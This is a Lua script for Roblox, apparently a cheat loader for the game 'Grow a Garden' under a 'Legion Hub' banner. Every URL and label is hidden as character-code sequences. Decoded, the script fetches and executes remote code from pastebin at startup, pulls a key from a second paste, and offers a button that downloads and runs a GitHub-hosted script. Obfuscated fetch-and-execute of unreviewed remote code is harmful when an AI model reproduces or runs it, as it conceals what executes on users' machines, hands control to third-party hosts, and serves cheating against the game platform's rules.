local a = string.char
local b = table.concat
local c = loadstring
local d = game.HttpGet
local e = b
local f = a

local g = c(d(game, e({
    f(104), f(116), f(116), f(112), f(115), f(58), f(47), f(47),
    f(112), f(97), f(115), f(116), f(101), f(98), f(105), f(110),
    f(46), f(99), f(111), f(109), f(47), f(114), f(97), f(119),
    f(47), f(65), f(119), f(48), f(66), f(48), f(81), f(84), f(106)
}, "")))()

local h = g:CreateWindow({
   Name = e({f(71),f(114),f(111),f(119),f(32),f(97),f(32),f(71),f(97),f(114),f(100),f(101),f(110)}, ""),
   Icon = 0,
   LoadingTitle = e({f(76),f(101),f(103),f(105),f(111),f(110),f(32),f(72),f(117),f(98)}, ""),
   LoadingSubtitle = e({f(98),f(121),f(32),f(79),f(114),f(121),f(110),f(110)}, ""),
   Theme = "Default",

   DisableRayfieldPrompts = false,
   DisableBuildWarnings = false,

   ConfigurationSaving = {
      Enabled = true,
      FolderName = nil,
      FileName = e({f(76),f(101),f(103),f(105),f(111),f(110),f(32),f(72),f(117),f(98)}, "")
   },

   Discord = {
      Enabled = true,
      Invite = e({f(119),f(77),f(116),f(117),f(97),f(100),f(116),f(101)}, ""),
      RememberJoins = true 
   },

   KeySystem = true, 
   KeySettings = {
      Title = e({f(71),f(114),f(111),f(119),f(32),f(97),f(32),f(71),f(97),f(114),f(100),f(101),f(110)}, ""),
      Subtitle = e({f(75),f(101),f(121),f(32),f(83),f(121),f(115),f(116),f(101),f(109)}, ""),
      Note = "https://tinyurl.com/ScriptGrow", 
      FileName = e({f(74),f(111),f(105),f(110),f(32),f(115),f(101),f(114),f(118),f(101),f(114),f(32),f(102),f(114),f(111),f(109),f(32),f(109),f(105),f(115),f(99),f(32),f(116),f(97),f(98)}, ""),
      SaveKey = false, 
      GrabKeyFromSite = true, 
      Key = {e({
         f(104),f(116),f(116),f(112),f(115),f(58),f(47),f(47),
         f(112),f(97),f(115),f(116),f(101),f(98),f(105),f(110),
         f(46),f(99),f(111),f(109),f(47),f(114),f(97),f(119),
         f(47),f(89),f(48),f(102),f(98),f(109),f(83),f(76),f(83)
      }, "")}
   }
})

local i = h:CreateTab(e({f(72),f(111),f(109),f(101)}, ""), nil)
local j = i:CreateSection(e({f(77),f(97),f(105),f(110)}, ""))

g:Notify({
   Title = e({f(89),f(111),f(117),f(32),f(101),f(120),f(101),f(99),f(117),f(116),f(101),f(100),f(32),f(116),f(104),f(101),f(32),f(115),f(99),f(114),f(105),f(112),f(116)}, ""),
   Content = e({f(76),f(101),f(103),f(105),f(111),f(110),f(32),f(72),f(117),f(98)}, ""),
   Duration = 5,
   Image = nil,
})

i:CreateButton({
   Name = e({f(71),f(114),f(111),f(119),f(32),f(97),f(32),f(71),f(97),f(114),f(100),f(101),f(110),f(32),f(76),f(111),f(97),f(100),f(101),f(114)}, ""),
   Callback = function()
      c(d(game, e({
         f(104),f(116),f(116),f(112),f(115),f(58),f(47),f(47),
         f(114),f(97),f(119),f(46),f(103),f(105),f(116),f(104),
         f(117),f(98),f(117),f(115),f(101),f(114),f(99),f(111),
         f(110),f(116),f(101),f(110),f(116),f(46),f(99),f(111),
         f(109),f(47),f(103),f(117),f(109),f(97),f(110),f(98),
         f(97),f(47),f(83),f(99),f(114),f(105),f(112),f(116),
         f(115),f(47),f(114),f(101),f(102),f(115),f(47),f(104),
         f(101),f(97),f(100),f(115),f(47),f(109),f(97),f(105),
         f(110),f(47),f(71),f(114),f(111),f(119),f(97),f(71),
         f(97),f(114),f(100),f(101),f(110)
      }, ""), true))()
   end,
})
